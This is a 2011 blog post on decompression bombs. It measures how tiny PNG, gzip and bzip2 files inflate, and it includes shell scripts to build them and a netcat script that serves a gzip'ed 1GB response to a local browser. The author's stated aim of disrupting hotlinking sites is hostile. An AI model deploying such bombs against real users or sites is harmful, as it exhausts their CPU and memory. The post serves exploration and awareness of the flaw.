Sep 9, 2011

Big Strings Come in Small Packages

Just how much data can we compress into a small file of an everyday format? Turns out it's quite a bit.

A couple of years ago I tried to battle hotlinkers by weaponizing image files. By substituting the original image with a shock-site-type image or a large, annoying high-contrast pattern, I hoped to disrupt the offending sites' layout, readability and/or sense; hopefully resulting in complaints and the link getting pulled. That didn't work, but while reading about dazzle camouflage and constructing intentionally annoying image files I noticed something: highly-repetitive-pattern images compress extremely well in the PNG format; so well that a screen-filling 1024×1280 PNG compressed into a 1K file. In many cases these screen-sized images were smaller than the HTTP headers used to send them.

Taking this to its logical conclusion: how large an image can we fit into a suitably small PNG file? Using GIMP with a 1-bit color depth and a single color (a command-line sketch follows the table):

Dimensions  1²    256²   2048²   4096²   8192²   16384²
Pixels      1     64K    4M      16M     64M     268M
Bytes       95    116    618     2144    8257    32761
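
These files are easy to reproduce outside GIMP. Here's a minimal sketch assuming ImageMagick's convert is available (the originals were made in GIMP, so exact byte counts may differ slightly):

#!/bin/sh
# Generate a solid-black 1-bit PNG at each test size and report its bytes.
for side in 1 256 2048 4096 8192 16384
do
  convert -size ${side}x${side} xc:black -type Bilevel black-$side.png
  wc -c black-$side.png
done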

This means an image file could be transferred over a network in mere milliseconds, yet require seconds' worth of CPU to decompress and hundreds of MB of RAM to hold, all while being essentially invisible to the user.

Browsers on Windows XP each react quite differently when displaying the 32K 16384×16384 PNG:

Browser      CPU / RAM behavior
Chrome 13    barely a blip
IE6          spikes briefly but returns to baseline quickly
Opera 11.51  several seconds of heavy CPU; permanently allocates ~256MB
Firefox 6    heavy, sporadic CPU; allocates ~1GB of RAM

After some research I realized that I had just rediscovered the decompression bomb.

A decompression bomb is an attack whereby a compressed file is carefully crafted to decompress into pathologically large output, with the goal of overwhelming the receiver with data. It can be an end in itself, but may also be intended to divert archive-scanning antivirus systems from the true attack. Decompression bombs have been around since at least the 1980s and come in several flavors: Zip bombs, email bombs and XML bombs.
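
As a minimal sketch of the Zip-bomb flavor (assuming the Info-ZIP zip tool is installed), a single layer is just a huge, trivially compressible stream stuffed into an archive; real Zip bombs nest such archives several layers deep:

# 1GB of zeroes becomes an archive of roughly a megabyte;
# '-' tells zip to read its input from stdin.
dd if=/dev/zero bs=1M count=1024 | zip bomb.zip -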

Could today's widespread file formats be susceptible to a similar attack?

Libpng was susceptible to decompression bombs until quite recently, and any application either using an older version or not following the new recommendations remains so. What other widely used software may be susceptible to decompression bombs?

General Applicability

Several standard components of the WWW rely on compression. When responding to an HTTP request (say, for a hotlinked image), we might mount an asymmetric attack by returning gzip'ed HTTP content that decompresses into an enormous payload, potentially consuming disproportionate CPU and memory on the client's machine. We'll throw in the less widely used but formidable bzip2 for comparison.

The following script generates streams of zero bytes ('\0'), compresses them and saves them to disk:

#!/bin/sh
# Emit $1 blocks of 4096 zero bytes ('\0') on stdout.
zeroes() {
  dd if=/dev/zero bs=4096 count=$1
}
# Generate 4MB, 8MB, ... 1GB of zeroes; compress each with bzip2 and gzip.
blocks=1024
for n in $(seq 1 9)
do
  bytes=$((4096*blocks))
  zeroes $blocks | bzip2 - > zero-$bytes.bz2
  zeroes $blocks | gzip - > zero-$bytes.gz
  blocks=$((blocks*2))
done

Results

Original size  4MB   8MB   16MB   32MB   64MB   128MB   256MB   512MB   1GB
Gzip'ed        4KB   8KB   16KB   32KB   65KB   130KB   260KB   512KB   1MB
Bzip2'ed       48B   48B   45B    46B    79B    112B    208B    402B    785B

Bzip2 performs astoundingly well, compressing streams of zero bytes (minus overhead) by a factor of roughly one million(!): 1GB shrinks to 785 bytes. If HTTP supported bzip2 we could easily construct a response the size of an icon which, when decompressed, would tie up a client's CPU and a large portion of their memory.
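
A quick way to sanity-check that ratio on the largest file (using the zero-1073741824.bz2 produced by the script above):

# 785 bytes on disk...
wc -c < zero-1073741824.bz2
# ...decompress back to 1073741824 bytes (1GB).
bzcat zero-1073741824.bz2 | wc -c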

Gzip's output grows linearly with its input, compressing the original by a roughly constant factor of ≅1000. This performance is not close to bzip2's, but is enough to make a decompression bomb worth trying. Let's build a test HTTP response using a gzip'ed stream of zeroes and see how much RAM a web browser uses when loading it.
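
Here's a minimal sketch of such a response, served with netcat (flag syntax varies between netcat variants; this assumes the traditional -l -p form, and uses the zero-1073741824.gz file produced by the script above):

#!/bin/sh
# Serve one hand-built HTTP response whose gzip'ed body inflates to 1GB.
body=zero-1073741824.gz
len=$(wc -c < $body)
{
  printf 'HTTP/1.1 200 OK\r\n'
  printf 'Content-Type: text/html\r\n'
  printf 'Content-Encoding: gzip\r\n'
  printf 'Content-Length: %d\r\n\r\n' $len
  cat $body
} | nc -l -p 8080

Point a browser at http://localhost:8080/ and watch its memory usage.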
